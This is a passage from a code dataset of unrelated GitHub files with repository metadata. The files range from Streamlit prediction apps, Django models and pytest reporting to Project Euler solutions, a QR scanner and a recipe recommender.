sections\n generated_sections.append(generated_section)\n\n # Combine the generated sections into a finished article\n article = \"\\n\\n\".join(generated_sections)\n\n # Save the article to a text file\n with open(\"long_form_article.txt\", \"w\") as file:\n file.write(article)\n\n # Return the article\n return article\n\n\n\n# Get the transcript from the video\ntranscription = get_transcript(\"Your Youtube Video URL\")\n\n# Get the token length of the transcript\ntoken_count = count_tokens(transcription)\nprint(token_count)\n\n\n\n# Summarize with either GPT3 or T5 depending on length of transcript:\nif token_count > 3000:\n summarized_text = summarize_text(transcription)\n new_token_count = count_tokens(summarized_text)\nelse:\n summarized_text = gpt_summarize_transcript(transcription,token_count)\n new_token_count = count_tokens(summarized_text) \n\n\n\n# Generate the tweet thread using the summary\ntweets = generate_tweet_thread(summarized_text)\n\n\n\n# Generate the long-form article using the summary\narticle = generate_long_form_article(summarized_text,new_token_count)\n\n\n\n\n","repo_name":"Phishman81/audio-transcript","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41219809003","text":"from django.db import models\nfrom Users.models import Users\nclass Shopcart(models.Model):\n id = models.AutoField(primary_key=True)\n #购买商品\n goods = models.CharField(max_length=20)\n #购买数量\n count = models.IntegerField()\n #添加时间\n add_time = models.TimeField()\n #小记金额\n subtotal = models.IntegerField()\n #所属用户\n users = models.ForeignKey(Users)\n\n\n# Create your models here.\n","repo_name":"wzk1997/commerce","sub_path":"shopcart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3052913378","text":"import streamlit as st\nimport pandas as pd\nimport streamlit.components.v1 as components\nimport time\nimport numpy as np\nimport pickle\nimport json\nfrom sklearn.ensemble import RandomForestRegressor\nimport altair as alt\n\nwith open('locations.json','r') as f:\n location = json.load(f)\n\n\n\nwith open('mysore_home_prices_model.pickle', 'rb') as f:\n model = pickle.load(f)\n\nwith open(\"columns.json\", \"r\") as f:\n data_columns = json.load(f)['data_columns']\n \n\ndef predict_price(location,ppsqft,area,beds): \n loc_index = data_columns.index(location)\n beds_index = data_columns.index(beds)\n \n x = np.zeros(len(data_columns))\n #x[0] = beds\n x[0] = area\n x[1] = ppsqft\n \n if loc_index >= 0:\n x[loc_index] = 1\n if beds_index >= 0:\n x[beds_index] = 1\n\n return model.predict([x])[0]\n\n@st.cache\ndef load_data():\n data = pd.read_csv('combined_cleaned.csv')\n return data\n\ndata_load_state = st.text('Loading data...')\ndata = load_data()\ndata_load_state.text(\"\")\nlocation_list = list(location.keys())\nlocation_list.append('None')\n\n\n## Sidebar code\ncities_filter = st.sidebar.multiselect('Select 2 more locaitons for price comparision', location_list)\nif cities_filter:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index(cities_filter[0]))\nelse:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index('None'))\nbeds_select = st.sidebar.slider('Number of Beds', 1,8) \n\n\n# main page code\nst.markdown(\"\"\"
House Price Prediction - Mysore
\"\"\",unsafe_allow_html=True)\n\n\nif loc_select != 'None':\n predicted_price = round(predict_price(loc_select,location[loc_select],(500*beds_select)+500,beds_select),2)\n if predicted_price >= 100:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"
₹{round(predicted_price/100,2)} Crores
\"\"\",unsafe_allow_html=True)\n else:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"
Predict the price of a laptop that would suit your needs the best.
\", unsafe_allow_html=True)\r\n\r\n st.write(\"A random forest is a machine learning technique that's used to solve regression and classification problems.\")\r\n st.write(\"Random Forest Regression is a supervised learning algorithm that uses ensemble learning method for regression. Ensemble learning method is a technique that combines predictions from multiple machine learning algorithms to make a more accurate prediction than a single model.\")\r\n st.write(\"Random Forest Regression model is powerful and accurate. It usually performs great on many problems, including features with non-linear relationships. Disadvantages, however, include the following: there is no interpretability, overfitting may easily occur, we must choose the number of trees to include in the model.\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n \r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_ba013t74.json\")\r\n\r\n st_lottie(lottie_coding, height=200, key=\"coding\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\n elif choice == \"About\":\r\n # Title\r\n st.markdown(\"
Laptop Price About
\", unsafe_allow_html=True)\r\n st.write(\"
Predict the price of a laptop that would suit your needs the best.
'\n Email.send_email(html)\n print(html)\n with open (\"G:/8.python/pytest_testApi/report/report.html\", \"w\") as f:\n f.write(html)\n else:\n print(\"本次测试,所有用例全部通过\")\n #send_email(\"本次测试,所有用例全部通过\")\n\n#\n#\nif __name__ == '__main__':\n #pytest.main(['--html=../report/report.html','test_cashierPay01.py'])\n # pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' +datetime.datetime.today().strftime('%Y-%m-%d')+ '.html'])\n pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' + time.strftime(\"%Y%m%d%H%M%S\",time.localtime(time.time())) + '.html'])\n\n","repo_name":"amnpt/EpspTest","sub_path":"testCase/test_epspApi.py","file_name":"test_epspApi.py","file_ext":"py","file_size_in_byte":12129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32387678104","text":"import subprocess\nimport sys\n\ndef get_platform():\n platforms = {\n 'linux1' : 'Linux',\n 'linux2' : 'Linux',\n 'darwin' : 'OS X',\n 'win32' : 'Windows'\n }\n \n if sys.platform not in platforms:\n return sys.platform\n \n return platforms[sys.platform]\n\n \ndef checkKey(d, k):\n if k in d:\n return True\n else:\n return False\n\ndef run(command:str):\n data = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n # print(data.args)\n # print(data.returncode)\n \n if data.returncode == 0:\n # print(data.stdout.decode())\n return {\"status\": True, \"result\" : data.stdout.decode()}\n else:\n # print(data.stderr.decode())\n return {\"status\": False, \"result\" : data.stderr.decode()}\n\n return data\n","repo_name":"HenriqueLuizz/inspetor-lestrade","sub_path":"src/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39159521772","text":"from src.core.model import *\nfrom src.core.barcode import *\nfrom src.core.date import *\nfrom src.core.webscraping import *\nfrom database.tables import *\nfrom database.database import Database\n\ndef sub_menu_options():\n print('1. Capturar fotos de estudiante')\n print('2. Actualizar sistema')\n print('3. Regresar')\n return int(input('Seleccionar opción: '))\n\ndef sub_menu():\n while True:\n opt = sub_menu_options()\n\n if opt == 1:\n print('Por favor, muestre el cósigo de barras del carnet...')\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n student_id = barcode_detector.get_id()\n db = Database()\n\n if db.student_exists(student_id):\n print('Este proceso es solo para nuevos estudiantes...')\n else:\n web_scraper = WebScraper(student_id)\n web_scraper.initialize_driver()\n student = web_scraper.scrape_student_data()\n\n db.insert_student(student)\n web_scraper.close_driver()\n print(student.name, ' agregado a la base de datos!')\n\n print('Para tomar fotos de tu rostro, por favor mire la cámara...')\n capture_frame = CaptureFrame(student_id)\n capture_frame.capture_faces()\n capture_frame.release_resources()\n print('Capturas de imágenes guardadas!')\n\n elif opt == 2:\n face_trainer = FaceRecognitionTrainer()\n face_trainer.train_model()\n\n elif opt == 3:\n print('Regresando...')\n break\n\n else:\n print('Esta opción no existe, inténtalo de nuevo.')\n\ndef menu_options():\n print('::::::: checkID :::::::')\n print('1. Comenzar')\n print('2. Opciones de administrador')\n print('3. Crear base de datos')\n print('4. Salir')\n return int(input('Seleccione una opción: '))\n\ndef menu():\n while True:\n option = menu_options()\n if option == 1:\n\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n id = int(barcode_detector.get_id())\n db = Database()\n if db.student_exists(id):\n print('Código validado')\n face_recognition = FaceRecognition(id)\n face_recognition.load_model()\n face_recognition.recognize_faces()\n if face_recognition.validated:\n date = CurrentDate()\n registration = Registration(id, date.get_current_date(), date.get_current_time())\n db.insert_registration(registration)\n print('Acceso otorgado!')\n else:\n print('El rostro no coincide')\n else:\n print('No eres de esta universidad')\n\n elif option == 2:\n sub_menu()\n\n elif option == 3:\n db = Database()\n db.create_tables()\n student1 = Student(21200026, 'rodrigo davila vasquez', 'ingeniería de software')\n student2 = Student(21200195, 'Kevin tupac aguero', 'ingeniería de software')\n db.insert_student(student1)\n db.insert_student(student2)\n\n elif option == 4:\n print('Saliendo del sistema...')\n break\n\n else:\n print('Esta opción no existe, intténtalo de nuevo')\n\nif __name__ == '__main__':\n menu()\n","repo_name":"diegoam11/check-id","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38825571812","text":"from __future__ import print_function\nimport pickle\nfrom game import Board, Game\nfrom mcts_pure import MCTSPlayer as MCTS_Pure\nfrom mcts_alphaZero import MCTSPlayer\nfrom police_value_net_numpy import PolicyValueNetNumpy\nfrom policy_value_net_pytorch import PolicyValueNet\n\nclass Human(object):\n def __init__(self):\n self.player = None\n\n def setPlayerInd(self, p):\n self.player = p\n\ndef run():\n n, width, height = 5, 8, 8\n model_file = 'best_policy_8_8_5.model'\n try:\n board = Board(width = width, height = height, n_in_row = n)\n game = Game(board)\n policy_param = pickle.load(open(model_file, 'rb'), encoding = 'bytes')\n bestPolicy = PolicyValueNetNumpy(width, height, policy_param)\n mctsPlayer = MCTSPlayer(bestPolicy.policyValueFn, cPuct = 5, nPlayout = 400)\n human = Human()\n game.startPlay(human, mctsPlayer, startPlayer = 1, isShown = 1)\n except KeyboardInterrupt:\n print('\\n\\rquit')\n\nif __name__ == '__main__':\n run()","repo_name":"Tokiwa-17/fiveInARow","sub_path":"human_play.py","file_name":"human_play.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70061105927","text":"from collections import defaultdict\n\nfrom utils.exceptions import SolutionNotFoundError\n\n\ndef get_digit_tuple(n: int) -> tuple[int, ...]:\n \"\"\"Get a 10-tuple of the digits of n.\"\"\"\n y = n\n dlist = [0] * 10\n while y != 0:\n d = y % 10\n dlist[d] += 1\n y //= 10\n return tuple(dlist)\n\n\ndef get_smallest_cube_with_five_perms() -> int:\n \"\"\"Get the smallest cube with 5 permutations that are also cube.\"\"\"\n tuples = defaultdict(set)\n max_n = 10000\n for n in range(max_n):\n cube = n**3\n tup = get_digit_tuple(cube)\n tuples[tup].add(cube)\n if len(tuples[tup]) == 5:\n return min(tuples[tup])\n raise SolutionNotFoundError(f\"No solution for n<{max_n}.\")\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p062.py","file_name":"p062.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7292729889","text":"from rest_framework import serializers\n\nfrom .models import Product\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n image = serializers.ImageField(\n max_length = None, allow_empty_file = False, allow_null = True, required = False) #requirements\n class Meta:\n model = Product\n fields = ('id', 'name', 'activity', 'country','mountains','description', 'price', 'image', 'price_table', 'category','description_long', 'product_url', 'location', 'slopes_easy', 'slopes_medium', 'slopes_hard', 'slopes_total', 'snow_mountain','snow_valley', 'rating_resort', 'rating_family' ,'rating_scenery', 'resort_map', 'peak_altitude')\n\n","repo_name":"rhribar/airjoy.io","sub_path":"api/product/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"26149793970","text":"class Solution:\n def smallestBeautifulString(self, s: str, k: int) -> str:\n n = len(s)\n arr = [ord(ch) for ch in s]\n\n # since s has already been beautiful\n # for i position, we only need to check i-1 and i-2 position\n # i-1: AA palindrome\n # i-2: AXA palindrome\n def checkBautiful(arr, i):\n if i-1 >= 0 and arr[i-1] == arr[i]: # check AA palindrome\n return False\n if i-2 >= 0 and arr[i-2] == arr[i]: # check AXA palindrome\n return False\n return True\n \n for i in range(n-1, -1, -1):\n for ch in range(arr[i]+1, ord(\"a\")+k):\n arr[i] = ch\n if checkBautiful(arr, i):\n k = i+1\n \n while k < n:\n mod = 0\n arr[k] = ord(\"a\")+mod\n while not checkBautiful(arr, k):\n mod = (mod+1)%3\n arr[k] = ord(\"a\")+mod\n\n k += 1\n\n return \"\".join(chr(rune) for rune in arr)\n return \"\"\n","repo_name":"Vergil0327/leetcode-history","sub_path":"String/2663. Lexicographically Smallest Beautiful String/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9259114506","text":"from auditlog.models import AuditlogHistoryField\nfrom auditlog.registry import auditlog\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\n\nfrom sme_ptrf_apps.core.models_abstracts import ModeloBase\nfrom .fornecedor import Fornecedor\nfrom .validators import cpf_cnpj_validation\nfrom ..status_cadastro_completo import STATUS_CHOICES, STATUS_COMPLETO, STATUS_INCOMPLETO\nfrom ...core.models import Associacao\n\n\nclass Despesa(ModeloBase):\n history = AuditlogHistoryField()\n\n associacao = models.ForeignKey(Associacao, on_delete=models.PROTECT, related_name='despesas', blank=True,\n null=True)\n\n numero_documento = models.CharField('Nº do documento', max_length=100, default='', blank=True)\n\n tipo_documento = models.ForeignKey('TipoDocumento', on_delete=models.PROTECT, blank=True, null=True)\n\n data_documento = models.DateField('Data do documento', blank=True, null=True)\n\n cpf_cnpj_fornecedor = models.CharField(\n \"CPF / CNPJ\", max_length=20, validators=[cpf_cnpj_validation]\n , blank=True, null=True, default=\"\"\n )\n\n nome_fornecedor = models.CharField(\"Nome do fornecedor\", max_length=100, default='', blank=True)\n\n tipo_transacao = models.ForeignKey('TipoTransacao', on_delete=models.PROTECT, blank=True, null=True)\n\n documento_transacao = models.CharField('Nº doc transação', max_length=100, default='', blank=True)\n\n data_transacao = models.DateField('Data da transacao', blank=True, null=True)\n\n valor_total = models.DecimalField('Valor Total', max_digits=8, decimal_places=2, default=0)\n\n valor_recursos_proprios = models.DecimalField('Valor pago com recursos próprios', max_digits=8, decimal_places=2,\n default=0)\n\n valor_original = models.DecimalField('Valor original', max_digits=8, decimal_places=2, default=0)\n\n status = models.CharField(\n 'status',\n max_length=15,\n choices=STATUS_CHOICES,\n default=STATUS_INCOMPLETO\n )\n\n @property\n def valor_ptrf(self):\n return self.valor_total - self.valor_recursos_proprios\n\n valor_ptrf.fget.short_description = 'Valor coberto pelo PTRF'\n\n def __str__(self):\n return f\"{self.numero_documento} - {self.data_documento} - {self.valor_total:.2f}\"\n\n def cadastro_completo(self):\n completo = self.tipo_documento and \\\n self.data_documento and \\\n self.cpf_cnpj_fornecedor and \\\n self.nome_fornecedor and \\\n self.tipo_transacao and \\\n self.data_transacao and \\\n self.valor_total > 0\n\n if completo and self.tipo_transacao.tem_documento:\n completo = completo and self.documento_transacao\n\n if completo and self.tipo_documento.numero_documento_digitado:\n completo = completo and self.numero_documento\n\n if completo:\n for rateio in self.rateios.all():\n completo = completo and rateio.status == STATUS_COMPLETO\n\n return completo\n\n def atualiza_status(self):\n cadastro_completo = self.cadastro_completo()\n status_completo = self.status == STATUS_COMPLETO\n if cadastro_completo != status_completo:\n self.save() # Força um rec'alculo do status.\n\n @classmethod\n def by_documento(cls, tipo_documento, numero_documento, cpf_cnpj_fornecedor, associacao__uuid):\n return cls.objects.filter(associacao__uuid=associacao__uuid).filter(\n cpf_cnpj_fornecedor=cpf_cnpj_fornecedor).filter(tipo_documento=tipo_documento).filter(\n numero_documento=numero_documento).first()\n class Meta:\n verbose_name = \"Despesa\"\n verbose_name_plural = \"Despesas\"\n\n\n@receiver(pre_save, sender=Despesa)\ndef proponente_pre_save(instance, **kwargs):\n instance.status = STATUS_COMPLETO if instance.cadastro_completo() else STATUS_INCOMPLETO\n\n\n@receiver(post_save, sender=Despesa)\ndef rateio_post_save(instance, created, **kwargs):\n # Existe um motivo para o fornecedor não ser uma FK nesse modelo e ele ser atualizado indiretamente\n # A existência da tabela de fornecedores é apenas para facilitar o preenchimento da despesa pelas associações\n # Alterações feitas por uma associação no nome de um fornecedor não deve alterar diretamente as despesas de outras\n if instance and instance.cpf_cnpj_fornecedor and instance.nome_fornecedor:\n Fornecedor.atualiza_ou_cria(cpf_cnpj=instance.cpf_cnpj_fornecedor, nome=instance.nome_fornecedor)\n\n\nauditlog.register(Despesa)\n","repo_name":"ollyvergithub/SME-PTRF-BackEnd","sub_path":"sme_ptrf_apps/despesas/models/despesa.py","file_name":"despesa.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"286272498","text":"\"\"\"\n see on psana\n /cds/sw/ds/ana/conda1/manage/bin/psconda.sh # lcls1\n /cds/sw/ds/ana/conda2/manage/bin/psconda.sh # lcls2\n see on s3df\n /sdf/group/lcls/ds/ana/sw/conda1/manage/bin/psconda.sh # lcls1\n /sdf/group/lcls/ds/ana/sw/conda2/manage/bin/psconda.sh # lcls2\n\n DIR_ROOT for repositories and logfiles through the environment variable:\n /reg/g/psdm # lcls\n /cds/group/psdm # lcls2\n /sdf/group/psdm # s3df ???\n\n DIR_PSDM\n /cds/group/psdm # on psana lcls2\n /cds/group/psdm # on sdflogin lcls2\n\n SIT_PSDM_DATA\n /sdf/data/lcls/ds/\n\n ffb data\n /sdf/data/lcls/drpsrcf/ffb/\n\nfrom psana.detector.dir_root import DIR_ROOT, DIR_REPO\n\"\"\"\nimport os\n\nHOSTNAME = os.getenv('HOSTNAME', None) # ex: pslogin02\nif HOSTNAME is None:\n import socket\n HOSTNAME = socket.gethostname()\n#print('TEST dir_root.HOSTNAME %s' % HOSTNAME)\n\nDIR_ROOT = os.getenv('DIR_PSDM') # /cds/group/psdm\nDIR_LOG_AT_START = os.path.join(DIR_ROOT, 'detector/logs/atstart/') # /cds/group/psdm/detector/logs/atstart\nDIR_REPO = os.path.join(DIR_ROOT, 'detector/calib2/constants') # common repository\nDIR_REPO_EPIX10KA = DIR_REPO\n#DIR_REPO_EPIX10KA = os.path.join(DIR_ROOT, 'detector/gains2/epix10ka/panels') # /cds/group/psdm/detector/gains2/epix10ka/panels\n#DIR_REPO_DARK_PROC = DIR_REPO\n#DIR_REPO_DARK_PROC = os.path.join(DIR_ROOT, 'detector/calib2') # /cds/group/psdm/detector/calib2\nDIR_DATA_TEST = os.path.join(DIR_ROOT, 'detector/data2_test') # /cds/group/psdm/detector/data2_test/\nDIR_REPO_CALIBMAN = DIR_REPO # prev: /cds/group/psdm/detector/calib2/constants/logs\n#DIR_LOG_CALIBMAN = os.path.join(DIR_ROOT, 'detector/logs/calibman/lcls2') # /cds/group/psdm/detector/logs/calibman/lcls2\n\n# for s3df\nDIR_DATA = os.getenv('SIT_PSDM_DATA', '/sdf/data/lcls/ds') # /sdf/data/lcls/ds/\nDIR_FFB = os.path.join(DIR_DATA, '../drpsrcf/ffb').replace('/ds/../','/') # '/sdf/data/lcls/drpsrcf/ffb'\n# EOF\n","repo_name":"slac-lcls/lcls2","sub_path":"psana/psana/detector/dir_root.py","file_name":"dir_root.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"}
+{"seq_id":"70917028808","text":"import cv2\nimport datetime\nfrom pyzbar.pyzbar import decode \n\nCam = cv2.VideoCapture(0)\ndetector = cv2.QRCodeDetector()\nwhile True:\n _,img=Cam.read()\n data,one, _=detector.detectAndDecode(img)\n success, frame = Cam.read()\n if data:\n a=data\n break\n cv2.imshow('Smile!',img)\n if cv2.waitKey(1)==ord('v'):\n continue\n for captureinfomartions in decode(frame):\n #Convert Informations to text file\n Make_txt_file = open(\"Information.txt\", \"w\")\n Make_txt_file.write(f\"{captureinfomartions.data.decode('utf-8')}\\n\" )\n \n #Add the time and date when data is scanned\n Date = datetime.datetime.now()\n Make_txt_file.write(Date.strftime(\"Date: %m/%d/%y \\n\"))\n Make_txt_file.write(Date.strftime(\"Time: %H:%M:%S\")) \n Make_txt_file.close()\n\nCam.release(a)\ncv2.destroyAllWindows()","repo_name":"edgarpesguerrajr/Assignment10","sub_path":"10.1.py","file_name":"10.1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43494410943","text":"\"\"\"Tests for the submission metadata parser.\"\"\"\n\nfrom importlib.resources import files\nfrom os.path import join as pathjoin\nfrom pathlib import Path\nfrom shutil import copyfileobj\n\nimport pytest\n\nfrom aga.gradescope.metadata import (\n GradescopeAssignmentMetadata,\n GradescopeSubmissionMetadata,\n load_submission_metadata_from_path,\n)\n\n\ndef test_example_metadata_id(example_metadata: GradescopeSubmissionMetadata) -> None:\n \"\"\"Test that the example metadata file's id is correct.\"\"\"\n assert example_metadata.id == 123456\n\n\ndef test_example_metadata_upload(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's upload is correct.\"\"\"\n assert example_metadata.submission_method == \"upload\"\n\n\ndef test_example_metadata_created_at(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's created at is correct.\"\"\"\n time = example_metadata.created_at\n assert time.year == 2018\n assert time.month == 7\n assert time.day == 1\n assert time.hour == 14\n assert time.minute == 22\n assert time.second == 32\n\n\ndef test_example_metadata_previous_submissions(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous submissions is empty.\"\"\"\n assert example_metadata.previous_submissions == []\n\n\ndef test_example_metadata_users(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous user is correct.\"\"\"\n users = example_metadata.users\n assert len(users) == 1\n\n user = users[0]\n assert user.email == \"student@example.com\"\n assert user.id == 1234\n assert user.name == \"Student User\"\n\n\n@pytest.fixture(name=\"example_metadata_assignment\")\ndef fixture_example_metadata_assignment(\n example_metadata: GradescopeSubmissionMetadata,\n) -> GradescopeAssignmentMetadata:\n \"\"\"Get the example metadata's assignment object.\"\"\"\n return example_metadata.assignment\n\n\ndef test_example_assignment_metadata_name(\n example_metadata_assignment: GradescopeAssignmentMetadata,\n) -> None:\n \"\"\"Test that the example metadata's assignment's name is correct.\"\"\"\n assert example_metadata_assignment.title == \"Programming Assignment 1\"\n\n\n@pytest.fixture(name=\"late_due_date_metadata\")\ndef fixture_late_due_date_metadata(tmp_path: Path) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"metadata_with_late_due_date.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\n@pytest.fixture(name=\"multiple_submission_metadata\")\ndef fixture_multiple_submission_metadata(\n tmp_path: Path,\n) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"multiple_submission_metadata.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\ndef test_late_due_date(late_due_date_metadata: GradescopeSubmissionMetadata) -> None:\n \"\"\"Test that we properly loda late due dates.\"\"\"\n assert late_due_date_metadata.assignment.late_due_date is not None\n assert late_due_date_metadata.assignment.late_due_date.year == 2022\n assert late_due_date_metadata.assignment.late_due_date.month == 8\n\n\ndef test_multiple_submission(\n multiple_submission_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that we properly load previous submissions.\"\"\"\n assert len(multiple_submission_metadata.previous_submissions) == 4\n","repo_name":"nihilistkitten/aga","sub_path":"tests/test_gradescope/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
+{"seq_id":"26021583196","text":"# Задача 1\n# На столе лежат n монеток. Некоторые из них лежат вверх решкой, \n# а некоторые – гербом. Определите минимальное число монеток, \n# которые нужно перевернуть, чтобы все монетки были повернуты \n# вверх одной и той же стороной. Выведите минимальное количество \n# монет, которые нужно перевернуть\n# 5 -> 1 0 1 1 0\n# 2\n\nprint('----------------------------------')\ncount = int(input(\"Введите количество монет \"))\nprint(\"1 = орел, 0 = решка\")\n\ncoin = [0] * count # массив монет\ntails = 0 # кол-во решек\n\nfor i in range(0, count): # да, я мог написать вместо range -> count, но тогда бы я не смогу выводить счет монет \n coin[i] = int(input(f\"{i + 1} монета лежит вверх: \"))\n if coin[i] == 0:\n tails = tails + 1\n\nprint()\nif tails < (count / 2):\n print(tails)\nelse:\n print(count - tails)\nprint('----------------------------------')","repo_name":"GRxAK/Python_start","sub_path":"lesson_02/homework_01.py","file_name":"homework_01.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19008540681","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http.response import JsonResponse\n\n# Imports to recommendations\nimport numpy as np\nimport nltk\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport ast\nimport pandas as pd\nimport json\n\nps = PorterStemmer()\ncv = CountVectorizer(max_features = 5000, stop_words='english')\nrecetas = pd.read_csv('./RecomendApp/recetas.csv')\nrecetas = recetas[['_id', 'nombre', 'calorias', 'carbohidratos', 'categoria', 'grasa', 'proteina', 'tiempoPreparacion', 'ingredientes']]\n\ndef convert(obj):\n L = []\n for i in ast.literal_eval(obj):\n L.append(i['idIngrediente'])\n return L\n\ndef convert2(obj):\n L = []\n for i in json.loads(obj):\n if i['vegetarian'] == \"true\":\n L.append('vegetarian')\n else:\n L.append('novegetarian')\n\n if i['vegan'] == \"true\":\n L.append('vegan')\n else:\n L.append('novegan')\n\n if i['glutenFree'] == \"true\":\n L.append('glutenfree')\n else:\n L.append('noglutenfree')\n\n if i['dairyFree'] == \"true\":\n L.append('dairyfree')\n else:\n L.append('nodairyfree')\n\n if i['veryHealthy'] == \"true\":\n L.append('veryHealthy')\n else:\n L.append('noveryHealthy')\n\n return L\n\ndef convert3(obj):\n L = []\n L.append(str(obj))\n return L\n\ndef stem(text):\n y = []\n\n for i in text.split():\n y.append(ps.stem(i))\n return \" \".join(y)\n\ndef recommend(receta):\n recomend = []\n receta = int(receta)\n receta_index = new_df[new_df['_id'] == receta].index[0]\n distances = similarity[receta_index]\n recetas_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\n\n for i in recetas_list:\n recomend.append(recetas.iloc[i[0]]._id)\n\n return recomend\n\nrecetas['ingredientes'] = recetas['ingredientes'].apply(convert)\nrecetas['categoria'] = recetas['categoria'].apply(convert2)\n\nrecetas['categoria'] = recetas['categoria'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\nrecetas['ingredientes'] = recetas['ingredientes'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\n\nrecetas['calorias'] = recetas['calorias'].apply(convert3)\nrecetas['carbohidratos'] = recetas['carbohidratos'].apply(convert3)\nrecetas['grasa'] = recetas['grasa'].apply(convert3)\nrecetas['proteina'] = recetas['proteina'].apply(convert3)\nrecetas['tiempoPreparacion'] = recetas['tiempoPreparacion'].apply(convert3)\n\nrecetas['tags'] = recetas['calorias'] + recetas['carbohidratos'] + recetas['grasa'] + recetas['proteina'] + recetas['tiempoPreparacion'] + recetas['ingredientes'] + recetas['categoria']\nnew_df = recetas[['_id', 'nombre', 'tags']]\nnew_df['tags'] = new_df['tags'].apply(lambda x:\" \".join(x))\nnew_df['tags'] = new_df['tags'].apply(lambda x:x.lower())\nnew_df['tags'] = new_df['tags'].apply(stem)\n\nvectors = cv.fit_transform(new_df['tags']).toarray()\nsimilarity = cosine_similarity(vectors)\n\n# Create your views here.\n\n@csrf_exempt\ndef recomendarApi(request, title):\n if request.method=='GET':\n recomendacion = recommend(title)\n response = np.array(recomendacion, dtype=np.int32)\n return JsonResponse({\"response\": response.tolist()}, safe=False)\n\n@csrf_exempt\ndef 